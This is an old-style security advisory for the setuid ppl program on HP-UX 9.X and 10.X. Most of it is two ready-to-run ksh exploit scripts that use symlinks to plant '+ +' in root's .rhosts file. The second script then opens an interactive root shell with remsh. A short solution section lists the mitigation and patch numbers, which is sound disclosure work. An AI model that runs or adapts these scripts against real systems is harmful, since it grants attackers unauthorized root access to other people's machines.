COMMAND

    /usr/bin/ppl (/bin/ppl)

SYSTEMS AFFECTED

    HP 9000 Series 700/800s running HP-UX releases 9.X & 10.X

PROBLEM

    The  ppl  application  is  HP's  version of SLIP, a Point-To-Point
    Serial Linking  protocol for  TCP/IP.   Here is  the exploit  that
    puts .rhosts file with "+ +".


	#!/bin/ksh

	# need update for 10.X
	# 10.X =/var/ppl/log

	VER=`uname -r | cut -f2 -d.`
	if [ "${VER}" = "10" ]
	then
		LOG=/var/ppl/log
	else
		LOG=/usr/spool/ppl/log
	fi

	mv $LOG $LOG.old
	ln -s /.rhosts $LOG
	ppl -o '\
	+ +
	'
	rm $LOG
	mv $LOG.old $LOG

    or

	#!/bin/ksh

	# ppl exploit, second part - SOD 15Oct96
	# not all buffer overruns need to force an address into the PC
	# works on 10.X, too, oddly enough. - Script Junkie

	#HOST='localhost'
	#USER=`whoami`

	HOST="+"
	USER="+"

	cd /tmp
	rm core 2> /dev/null
	ln -s ~root/.rhosts core
	AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
	STUFF=`echo "${AAA}\n${HOST} ${USER}"`
	ppl -o "${STUFF}"
	rm core
	remsh localhost -l root sh -i

SOLUTION

    To protect a  system, the /usr/bin/ppl  file should be  changed to
    owner only  access and  the suid  bit should  be cleared.  The ppl
    program will not run unless  it is has root privileges,  so normal
    users will not be  able to use it.  This will cause a  problem for
    normal users that are using SLIP  to gain access to a machine.  If
    ppl is needed for normal  operations, sites will have to  evaluate
    the risk  on a  case having  no patch.   The vulnerability  can be
    eliminated  from  HP-UX  releases  9.X  and  10.X  by applying the
    appropriate patch.  Apply patch:

        PHNE_9378 for all platforms with HP-UX releases 9.X
        PHNE_9375 for all platforms with HP-UX releases 10.00/10.01
        PHNE_9376 for all platforms with HP-UX releases 10.10
        PHNE_9771 for all platforms with HP-UX releases 10.20